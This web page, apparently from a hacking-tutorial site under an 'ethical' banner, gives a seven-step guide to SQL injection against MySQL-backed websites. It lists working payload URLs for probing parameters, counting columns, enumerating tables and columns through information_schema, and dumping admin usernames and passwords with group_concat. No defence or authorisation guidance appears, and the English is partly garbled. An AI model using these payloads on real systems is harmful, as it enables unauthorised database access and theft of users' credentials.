top of page

WEBSITE HACKING  LEARN ETHICALLY

 

SQL Injection attack in MySQL Databases:-

SQL Injection attacks are code injections that quick exploit the database layer of the application structure. This is the most commonly in the MySQL database, but there are some techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database attack.

Step 1:


When hackers testing a website for SQL Injection vulnerabilities, you always need to find a page that looks like this one:

www.site.com/page=1

or
www.site.com/id=5

Basically the site needs to have an = then a number or a string see carefully, but most commonly a number. Once you have found a page like this, we have test for vulnerability by simply entering a ' after the number in the URL. For example:

www.site.com/page=1'

If the database is vulnerable, then page will spit out a MySQL error such as below;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 21

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection attack other techniques can be manipulated.

 

Step 2

Now we have need to find the number of union columns in the database. We do this using the "order by" command attack. We do this by entering "order by 1--", "order by 2--" and so now we until we receive a page error see below. For example:

http://www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--

So If we receive another MySQL error here, then that means we have 4 columns then. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It is just like depends on the way the database is configured as to which prefix is used.

Step 3

We have now are going to use the "union" command to find the vulnerable columns. Now we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--

This is what just we would enter if we have 4 columns. If you have 7 columns you would put then,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers some where on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable for attack.


Step 4

We now need to find the database version, name and user. We will do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try below again

@@user
@@version
@@database

For example like the URL would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

Then resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.

IMPORTANT: If the version is 5 and above read on to carry out the attack possible, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this following.

 

Step 5

In this step our main aim is to list all the table names in the database. To do well this we enter the following command after the URL.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the URL we would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly quick to be work, then page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables database.

Step 6


In this Step we want to list all the column names in the database vary well done, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--

So the URL would look like this:

www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--

This command would makes the page spit out ALL the column names in the database fast. So again, look for interesting names such as user,email and password well.

Step 7

Finally we need to dump the data, so we want to get the "username" and "password" fields, from table "admin" we would like to use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:

www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess well done, if this command is successful then you should be presented with a page full of usernames and passwords from the website quickly.

 

"Connect" and Feel Free with Cyber Defence Group for WhiteHat Hacking  because we believe in Security.

  • Facebook App Icon
  • Twitter App Icon
  • Google+ App Icon
  • LinkedIn App Icon
  • Pinterest App Icon
bottom of page